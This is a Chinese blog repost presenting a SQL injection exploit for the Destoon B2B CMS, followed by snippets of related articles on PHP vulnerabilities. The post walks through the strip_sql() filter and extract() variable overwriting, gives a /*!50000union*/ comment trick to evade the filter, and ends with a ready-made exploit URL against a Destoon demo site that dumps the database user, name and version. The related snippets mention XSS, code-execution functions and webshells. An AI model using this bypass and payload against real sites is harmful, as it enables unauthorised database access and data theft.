array_map php ord,Destoon最新全版本通杀SQL注入漏洞

最新推荐文章于 2022-08-18 22:39:38 发布
最新推荐文章于 2022-08-18 22:39:38 发布
阅读量427 收藏
点赞数
文章标签: array_map php ord

Author:Kavia

/common.inc.php 64行:

[php]

if($_POST) $_POST = strip_sql($_POST);//strip_sql()过滤

if($_GET) $_GET = strip_sql($_GET);

if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);

.........

if($_POST) extract($_POST, EXTR_SKIP);//注册变量

if($_GET) extract($_GET, EXTR_SKIP);

[/php]

跟进strip_sql()

/include/global.func.php186行:

[php]

function strip_sql($string) {

$search = array("/union([[:space:]\/])/i","/select([[:space:]\/])/i","/update([[:space:]\/])/i","/replace([[:space:]\/])/i","/delete([[:space:]\/])/i","/drop([[:space:]\/])/i","/outfile([[:space:]\/])/i","/dumpfile([[:space:]\/])/i","/load_file\(/i","/substring\(/i","/ascii\(/i","/hex\(/i","/ord\(/i","/char\(/i");

$replace = array('union\\1','select\\1','update\\1','replace\\1','delete\\1','drop\\1','outfile\\1','dumpfile\\1','load_file(','substring(','ascii(','hex(','ord(','char(');

return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);

}

[/php]

采用了新的正则表达式,之前西毒放出的exp,已经无法绕过新版本的过滤了。

此处可采用新的绕过方式:/!5000union*/

首先寻找一个注射点:

/module/member/record.inc.php16行:

[php]

isset($mid) or $mid = 0;

isset($currency) or $currency = '';

$module_select = module_select('mid', $L['module_name'], $mid);

if($keyword) $condition .= " AND title LIKE '%$keyword%'";

if($fromtime) $condition .= " AND paytime>".(strtotime($fromtime.' 00:00:00'));

if($totime) $condition .= " AND paytime

if($mid) $condition .= " AND moduleid=$mid";

if($itemid) $condition .= " AND itemid=$itemid";

if($currency) $condition .= " AND currency='$currency'";

$r = $db->get_one("SELECT COUNT(*) AS num FROM {$DT_PRE}finance_pay WHERE $condition");//

$pages = pages($r['num'], $page, $pagesize);

$lists = array();

echo "SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize";

$result = $db->query("SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize");

[/php]

此处利用变量覆盖,就可以顺利构造sql注入

/member/record.php

[php]

require 'config.inc.php';

require '../common.inc.php';

require DT_ROOT.'/module/'.$module.'/record.inc.php';

?>

[/php]

引入了common.inc.php,所以存在变量覆盖。并且可以绕过正则的过滤。最终造成sql注入

[php]

exp:http://demo.destoon.com/v5.0/member/record.php?action=pay&mid=-1/*!50000union*//*!50000select*/user(),2,database(),version(),5,6,7,8,9--[/php]

15595098598
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
destoon注入漏洞
qq_34862577的博客
02-28 2793
漏洞名称:destoon注入漏洞漏洞等级: 高危披露时间:2017-03-22 08:59:13漏洞类型:Web-CMS漏洞漏洞描述:在php5.2下可以绕过waf,利用没有正确过滤的变量进行注入。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告...
php注入 php漏洞
06-24
给大家演示一个PHP注入的原理。那么怎么来利用呢,我们先来检查一下数据库用的是什么。大家都知道mysql和PHP都是支持 /* 注释符的。那么我们在 id=1 后面加了注释...我们把 id=3的数据也读取出来了,这就是注入漏洞
阿里云提示漏洞destoon变量覆盖导致延时注入
weixin_34060299的博客
08-18 278
出现漏洞 .../module/mall/my.inc.php .../backup/module/mall/my.inc.php 修复方法: my.inc.php里面所有的extract函数加上, EXTR_SKIP参数就可以 比如extract($item);修改成extract($item,EXTR_SKIP); ...
PHP array_map() 函数
冷月醉雪的博客
01-20 3210
  参考: https://www.yuque.com/docs/share/a945be3b-a139-4738-87d2-19fc53a64890      
漏洞学习——XSS】Destoon B2B网站管理系统存储xss
Fly_鹏程万里
02-22 1054
漏洞简介 Destoon B2B网站管理系统存储xss,可打后台cookie 我们在修改资料的地方插入xss 查看源代码- - 发现没有做任何的过滤 <td class="tr"> <input type="text" size="40" name="post[address]" id="daddress" value="\"&
array_reduce、array_map
小李李
09-03 715
array_map() 返回一个数组,该数组包含了 arr1 中的所有单元经过 callback 作用过之后的单元。callback接受的参数数目应该和传递给 array_map() 函数的数组数目一致。 $arr = array('2','3','4','5'); $new_arr = array_map('intval' , $arr);...
File_Read_ORD.zip_PCA 特征提取_pca_人脸识别
07-15
主成分分析(pca)是提取特征脸的主要方法,此代码用pca做人脸识别
change_NIC_ord.zip_fedora_linux网卡排序_nic网卡排序
09-14
标题"change_NIC_ord.zip_fedora_linux网卡排序_nic网卡排序"指向的就是一个关于如何在Fedora Linux系统中调整多网卡排序的实践操作。这个压缩包文件包含了一个名为`change_NIC_ord.sh`的脚本,用于帮助用户根据特定...
android-push-server-tomcat.rar_andrewsjavaweb_android tomcat_ord
09-23
【标题】"android-push-server-tomcat.rar_andrewsjavaweb_android tomcat_ord" 提供的是一个基于JavaWeb的安卓推送服务源码,该服务运行在Tomcat服务器上。"AndrewsJavaWeb"可能是一个特定项目或者框架的名称,而...
php使用str_shuffle()函数生成随机字符串的方法分析
10-20
`str_shuffle()`函数接收一个字符串作为参数,并返回该字符串的一个随机排列版本。其基本语法如下: ```php str_shuffle(string $string): string ``` 这里的`$string`参数是你想要打乱顺序的原始字符串。函数会...
php array_map()数组函数使用说明
10-28
函数array_map()函数:多数组回调函数---将回调函数作用到给定数组的单元上
Destoon(B2B网站系统) 6.0 GBK 20171011.zip
05-24
Destoon(B2B网站系统)使用当前流行的PHP语言开发,以MySQL为数据库,采用B/S架构,MVC模式开发。融入了模型化、模板、缓存、AJAX、SEO等前沿技术。与同类产品相比,系统功能更加强大、使用更加简单、运行更加稳定、安性更强,效率更高,用户体验更好。系统开源发布,便于二次开发、功能整合、个性修改。 Destoon 6.0 GBK 20171011 更新日志: [修复]手机版留言存在SQL注入漏洞;[修复]Kindeditor编辑器插入视频无法在手机版播放;[修复]分类设置了SEO信息没有优先显示;[修复]快钱支付接口无法支付成功;[修复]易宝支付错误信息未正确保存;[更新]常用支付接口申请地址;[更新]最新QQ视频匹配播放规则;[优化]Memcache服务无法连接时自动切换到文件缓存。
destoon php文件,Destoon 任意文件读取
weixin_32024145的博客
03-18 163
发布时间:2016-08-29公开时间:N/A漏洞类型:变量覆盖危害等级:高漏洞编号:xianzhi-2016-08-42442070测试版本:N/A漏洞详情include/remote.class.phpfunction construct($file, $savepath, $savename = '') {global $DT, $_userid;$this->file = strip...
任意代码执行漏洞
LJH1999ZN的博客
02-23 3119
一、什么是任意代码执行漏洞 web应用程序是指程序员在代码中使用了一些执行函数例如eval,assert等函数,用户可以控制这个字符串去这些函数中执行,从而造成安漏洞 二、漏洞的危害 执行任意的代码,例如协议脚本文件 向网站写入webshell 控制整个网站或者服务器 三、任意代码执行的漏洞 1.eval()函数 ...
PHP生成唯一订单号
怎奈你何的博客
07-29 3126
$order_number = date('Ymd').substr(implode(NULL, array_map('ord', str_split(substr(uniqid(), 7, 13), 1))), 0, 8); 简单从内到外解析一下这个订单号生成过程: 1、date("Ymd"):这个很容易理解,是在最前方拼接一个当前年月日组成的数字。 2、uniqid():此函数获取一个带前缀、基于当前时间微秒数的唯一ID。 3、substr(uniqid(), 7, 13):由于uniqid(.
PHP】危险函数使用不当时产生漏洞后对于函数的分析理解、产生原因、实例、绕过方法合集总结(弃坑)
EC_Carrot的博客
10-19 1048
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! is_numberic() 实例: <!-- if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elseif (
从实战理解代码执行漏洞函数(php
weixin_51692662的博客
08-18 785
php,RCE,漏洞,远程代码,安,代码执行
PHP代码审计9—代码执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1212
代码执行漏洞分析
php代码执行
h3110n3w0r1d
04-05 733
PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞 常见代码执行函数如 eval()、assert()、preg_replace()、create_function() array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort() 文件操作函数、动态函数($a($b)) ...
array_map('ord', str_split($str))转换为python写法
最新发布
05-10
在 Python 中,可以使用列表推导式和 ord() 函数来实现类似于 PHP 中的 array_map('ord', str_split($str)) 的功能。示例如下: ```python str = "hello" result = [ord(c) for c in str] print(result) ``` 输出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值